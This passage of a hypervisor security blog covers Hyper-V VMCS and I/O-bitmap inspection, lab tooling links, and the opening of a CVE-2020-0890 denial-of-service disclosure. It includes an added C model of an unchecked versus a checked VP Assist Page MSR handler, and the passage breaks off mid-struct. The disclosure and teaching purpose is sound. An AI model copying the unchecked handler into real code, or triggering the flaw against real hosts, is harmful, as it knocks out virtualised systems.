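    io_bitmap_trap_port(&g_root, 0xCF8);
    io_bitmap_trap_port(&g_root, 0xCFC);
    io_bitmap_trap_port(&g_root, 0x8000);   /* first port of bitmap B, to show the A/B split */
    return io_access_causes_vmexit(&g_root, port, size);
}

int main(void)
{
    printf("guest: byte access to port 0x60   -> exit=%d\n", guest_port_exits(0x60, 1));
    printf("root:  byte access to port 0x60   -> exit=%d\n", root_port_exits(0x60, 1));
    printf("root:  dword access to port 0xCF8 -> exit=%d\n", root_port_exits(0xCF8, 4));
    printf("root:  word access to port 0x7FFF -> exit=%d (second byte lands in bitmap B)\n",
           root_port_exits(0x7FFF, 2));
    return 0;
}
```

Compile with any C compiler and run it: the guest-style policy exits on every port, the root-style policy only on the ports whose bitmap bit is set, which is the difference visible in the VMCS fields shown further down.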
</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-scripts/blob/master/display-vmcs.py" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-scripts/blob/master/display-vmcs.py</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Load the script into the hvix64.exe IDA Pro database with the debugger attached to the hypervisor. 
It executes the stub</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmread rax, rax</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">jmp -3</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">inside hvix64.exe with rax set to each VMCS field encoding in turn, reads the resulting rax value and prints it to the console.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For comparison, here are some of the important VMCS fields obtained with display-vmcs.py after a VM exit:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 652px; overflow: hidden; width: 561px;"><img height="652" src="https://lh3.googleusercontent.com/DdH1ZQdf-bNtTrVNohvuBGlM4ruQ9A9jjkWBpW7ZNA709-niQdgn4cQMRGn-3hw8_Y_Ep4kctJPnKlUWniI-krYfuK5GtWjFVJKFJixrkabfSidQfFDUXtDRai9DmoEn4Xv8qudNkgL1GcWKRA" style="margin-left: 0px; margin-top: 0px;" width="561" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For instance, you can see that for a guest partition the hypervisor intercepts all port I/O ("Unconditional I/O exiting" is set), while for the root partition it intercepts only certain ports ("Use I/O bitmaps" is set).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!db 0x101001000 L1300</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">#101001000 00 00 00 00 03 00 00 00-00 00 00 00 10 00 00 00 ................</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">#101001010 00 00 00 00 03 00 00 00-00 00 00 00 00 00 00 00 ................</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">……………………………………………………</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">#101001080 00 00 00 00 00 00 00 00-20 00 00 00 00 00 00 00 ........ 
.......</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">………………………………………………………</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">#101001190 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 f1 ................</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can also modify the existing Linux Integration Services drivers for deep debugging of VMBus:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><a href="https://github.com/LIS" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/LIS</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; 
text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This article describes the steps needed to build a lab setup for Hyper-V research and briefly covers some aspects of how the hypervisor works. I hope this information will be useful to researchers starting out on the security of Microsoft’s hypervisor. 
I have collected links to tools and open-source utilities on github.com: </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-Internals/blob/master/HyperResearchesHistory.md" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-Internals/blob/master/HyperResearchesHistory.md</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(Hyper-V internals research history, section “Hyper-V related open source utilities, scripts”)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The scripts mentioned in the article 
are on GitHub:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-scripts" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-scripts</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Scripts tested on IDA Pro 7.5 are in the ida75 subfolder.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Radare2 build for Hyper-V debugging is available at:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span 
face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;"><a href="https://yadi.sk/d/eDAD9gIMEcAYEg" style="text-decoration: none;">https://yadi.sk/d/eDAD9gIMEcAYEg</a></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="font-size: 9pt; text-indent: 35.4pt;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span style="font-size: 9pt; text-indent: 35.4pt;">Hyper-V guest driver source:</span></p><p class="MsoNormal" style="margin-bottom: 0cm; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-Internals/tree/master/hyperv2019" style="font-size: 9pt; text-indent: 35.4pt;">https://github.com/gerhart01/Hyper-V-Internals/tree/master/hyperv2019</a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></p></span>Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-10587004800006045102020-09-03T09:29:00.004-07:002020-10-22T01:18:09.491-07:00Windows Hyper-V Denial of Service Vulnerability in nested virtualization component (CVE-2020-0890)<span id="docs-internal-guid-922d493f-7fff-267f-27ef-daaba9b8be1f"><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><br /></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: 
none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The vulnerability is triggered from a guest OS with the nested virtualization option enabled. Tested on Windows Server 2019 with August 2020 updates, Windows 10 20H1 with August 2020 updates, and Windows 10 21H1 Preview (build 20206.1000 and earlier).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The bug is also present in the original release of Windows Server 2019 without patches (November 2018).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="" style="background-color: transparent; color: black; font-size: 
8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PoC source on Github: </span><a href="https://github.com/gerhart01/hyperv_local_dos_poc" style="text-decoration: none;"><span face="" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://github.com/gerhart01/hyperv_local_dos_poc</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Software:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows Server 2019 in host OS;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Windows Server 2019 in guest OS;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: 
normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WinDBG preview</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA PRO freeware</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hyper-V nested virtualization for Intel CPUs was introduced in Windows Server 2016 and the Windows 10 Anniversary Update (2016): </span><a href="https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/nested-virtualization" style="text-decoration: none;"><span face="" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/nested-virtualization</span></a><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. 
It allows a hypervisor to run inside a guest OS (and enables features such as Windows Sandbox and MDAG inside a Hyper-V VM).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Technically the mistake in Hyper-V is very simple: the parameters of the VP Assist Page, whose address is written to the virtual VP Assist MSR (0x40000073), were not validated. Earlier MSR 0x40000073 was named </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_APIC_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">; now (in TLFS 6.0) it is </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. 
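Added illustration (this is neither Hyper-V's code nor the PoC linked above): a C model of the shape of MSR write handler this report is about. A guest writes HV_X64_MSR_VP_ASSIST_PAGE (0x40000073) using the layout of the VIRTUAL_VP_ASSIST_PAGE_PFN union shown below (bit 0 Enable, bits 11:1 reserved, bits 63:12 guest physical page number, as in the TLFS). The unchecked variant stores whatever PFN the guest supplied; the checked variant rejects nonzero reserved bits and a PFN outside the partition's guest-physical range. The partition_vp structure, its 1 GiB size and the status codes are assumptions made for this example, and it shows the class of validation an overlay-page MSR needs rather than the specific change Microsoft made in hvix64.exe.

```c
#include <stdint.h>
#include <stdio.h>

#define HV_X64_MSR_VP_ASSIST_PAGE 0x40000073u

/* MSR value layout (Hyper-V TLFS): bit 0 Enable, bits 11:1 reserved (RsvdZ),
   bits 63:12 guest physical page number of the VP assist overlay page. */
typedef union {
    uint64_t as_uint64;
    struct {
        uint64_t enable   : 1;
        uint64_t reserved : 11;
        uint64_t pfn      : 52;
    };
} hv_vp_assist_page_msr;

/* Hypothetical per-VP partition state for this example (not a Hyper-V structure). */
#define NO_OVERLAY UINT64_MAX
typedef struct {
    uint64_t max_gpa_pfn;     /* highest guest-physical page backed for this partition */
    uint64_t vp_assist_msr;   /* last accepted raw MSR value */
    uint64_t overlay_pfn;     /* page the hypervisor would overlay, or NO_OVERLAY */
} partition_vp;

enum msr_write_status {
    MSR_OK = 0,
    MSR_RESERVED_BITS_SET = 1,
    MSR_PFN_OUT_OF_RANGE = 2
};

/* Build the value a guest writes: GPA >> 12 into the PFN field plus the Enable bit. */
uint64_t vp_assist_msr_value(uint64_t gpa, int enable)
{
    hv_vp_assist_page_msr m = { .as_uint64 = 0 };
    m.enable = enable ? 1 : 0;
    m.pfn = gpa >> 12;
    return m.as_uint64;
}

/* Unchecked handler: the pattern the post describes, the guest-supplied PFN is trusted as-is. */
void vp_assist_msr_write_unchecked(partition_vp *vp, uint64_t value)
{
    hv_vp_assist_page_msr m = { .as_uint64 = value };
    vp->vp_assist_msr = value;
    vp->overlay_pfn = m.enable ? m.pfn : NO_OVERLAY;
}

/* Checked handler: refuse reserved bits and a PFN the partition does not own. */
enum msr_write_status vp_assist_msr_write_checked(partition_vp *vp, uint64_t value)
{
    hv_vp_assist_page_msr m = { .as_uint64 = value };
    if (m.reserved != 0)
        return MSR_RESERVED_BITS_SET;
    if (m.enable && m.pfn > vp->max_gpa_pfn)
        return MSR_PFN_OUT_OF_RANGE;       /* overlay page must lie inside guest memory */
    vp->vp_assist_msr = value;
    vp->overlay_pfn = m.enable ? m.pfn : NO_OVERLAY;
    return MSR_OK;
}

/* Hypothetical partition with 1 GiB of guest RAM: valid PFNs are 0 .. 0x3FFFF. */
static void init_example_partition(partition_vp *vp)
{
    vp->max_gpa_pfn = 0x3FFFF;
    vp->vp_assist_msr = 0;
    vp->overlay_pfn = NO_OVERLAY;
}

int checked_write_status(uint64_t value)
{
    partition_vp vp;
    init_example_partition(&vp);
    return (int)vp_assist_msr_write_checked(&vp, value);
}

uint64_t unchecked_overlay_pfn(uint64_t value)
{
    partition_vp vp;
    init_example_partition(&vp);
    vp_assist_msr_write_unchecked(&vp, value);
    return vp.overlay_pfn;
}

int main(void)
{
    uint64_t good  = vp_assist_msr_value(0x1000, 1);
    uint64_t bogus = vp_assist_msr_value(0xFFFFFFFFF000ULL, 1);   /* far outside guest RAM */
    printf("MSR 0x%x <- 0x%llx: checked=%d, unchecked overlays PFN 0x%llx\n",
           HV_X64_MSR_VP_ASSIST_PAGE, (unsigned long long)good,
           checked_write_status(good), (unsigned long long)unchecked_overlay_pfn(good));
    printf("MSR 0x%x <- 0x%llx: checked=%d, unchecked overlays PFN 0x%llx\n",
           HV_X64_MSR_VP_ASSIST_PAGE, (unsigned long long)bogus,
           checked_write_status(bogus), (unsigned long long)unchecked_overlay_pfn(bogus));
    return 0;
}
```

The checked handler deliberately ignores the PFN when Enable is clear, because a disabled MSR maps nothing; everything else that reaches the overlay-mapping code has been range-checked first.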
</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> msr structure:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="53" src="https://lh6.googleusercontent.com/7xvG_W4dEmw5M4Jux0CcbKJkil2ZLcBsCbMGH-ynUHXRV6OcPC8ZvZDqJWTYW9f68WdnneXOU4rhRS5igqB2c5l7rh562zy6ehr5xjSota-MH2UgTOK9exl6oCVaZ_FO20DUnB2F-6O_bI_Fcg" style="margin-left: 0px; margin-top: 0px;" width="406" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: 
pre-wrap;">typedef union _VIRTUAL_VP_ASSIST_PAGE_PFN</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">{</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT64 AsUINT64;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> struct</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> {</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> UINT64 Enable : 1;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; 
